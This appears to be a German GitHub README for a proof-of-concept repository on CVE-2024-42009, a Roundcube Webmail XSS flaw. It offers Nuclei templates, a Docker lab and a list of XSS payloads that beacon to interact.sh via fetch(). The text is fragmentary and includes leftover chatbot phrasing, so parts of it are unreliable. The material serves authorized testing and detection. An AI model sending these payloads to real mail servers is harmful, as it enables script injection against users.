
Nuclei template und Laborumgebung, um CVE-2024-42009, eine kritische Reflected-XSS-Sicherheitslücke in Roundcube Webmail, sicher zu demonstrieren, unter Verwendung von OOB-Erkennung via Interactsh für autorisierte Tests.
Dieses Repository enthält eine Nuclei-Vorlage und unterstützende Ressourcen, um CVE-2024-42009, eine kritische reflektierte XSS-Schwachstelle in Roundcube Webmail, sicher zu demonstrieren und zu validieren. Der Fehler liegt in der Funktion message_body() in show.php, wo Modifikationen nach der Bereinigung zu einer Entsanitisierung und unsicheren Wiedergabe von manipuliertem HTML-E-Mail-Inhalt führen.
⚠️ Dieser PoC ist nur für Bildungszwecke und autorisierte Tests bestimmt. Verwenden Sie ihn nicht gegen Systeme, die Sie nicht besitzen oder für die Sie keine ausdrückliche Erlaubnis zum Testen haben.
message_body() in show.phpDieses Repository verwendet die Out-of-Band (OOB)-Erkennung über Interactsh, um die JavaScript-Ausführung in einer kontrollierten Laborumgebung zu bestätigen.
<body>-Tag, das onanimationstart und einen Beacon an Interactsh enthältVerwenden Sie die bereitgestellte Docker-Compose-Datei, um eine lokale Roundcube-Instanz mit MailHog (SMTP-Sink) und MariaDB zu starten.
git clone https://github.com/Shubhankargupta691/CVE-2024-42009.git
cd CVE-2024-42009
docker compose up -d
http://localhost:8080http://localhost:8025⚠️ Verwenden Sie nicht Ihr Google-Konto.
CVE-2024-42009-OOB.yaml – Nuclei-Vorlage mit Interactsh- und Out-of-Band (OOB)-ErkennungCVE-2024-42009.yaml – Nuclei-Vorlage ohne Interactsh und OOBdocker-compose.yml – Einrichtung der Laborumgebung für Roundcube WebmailImages/ – Screenshots, die HTTP/DNS-Treffer von Interactsh zeigenDieses Video führt durch die gesamte Exploit-Kette:
Um diese XSS-Payloads verantwortungsvoll in Ihre README aufzunehmen, sollten Sie sie in einem Abschnitt platzieren, der deutlich für Bildungs- oder Testzwecke gekennzeichnet ist. Hier ist eine vorgeschlagene Struktur:
⚠️ Haftungsausschluss: Diese Payloads sind nur für Bildungszwecke und autorisierte Sicherheitstests bestimmt. Setzen Sie sie nicht auf Systemen ohne ausdrückliche Genehmigung ein.
<!-- Image tag with onerror -->
<img src="https://interact.sh/xss-test" onerror="fetch('https://interact.sh/hit')">
<!-- Broken image source with onerror -->
<img src="https://raw.githubusercontent.com/shubhankargupta691/cve-2024-42009/HEAD/x" onerror="fetch('https://interact.sh/hit')">
<!-- SVG with onload -->
<svg onload="fetch('https://interact.sh/hit')"></svg>
<!-- Script tag -->
<script>fetch('https://interact.sh/hit')</script>
<!-- JavaScript in iframe src -->
https://interact.sh/hit durch Ihren eigenen Listener-Endpunkt.Aktualisieren Sie Roundcube auf:
Perfekt — hier sehen Sie einen sauberen und professionellen Referenzen-Abschnitt, den Sie in Ihre README oder E-Mail-Einreichung für CVE-2024-42009 aufnehmen können. Er zitiert alle von Ihnen aufgeführten Quellen, formatiert für Klarheit und Glaubwürdigkeit: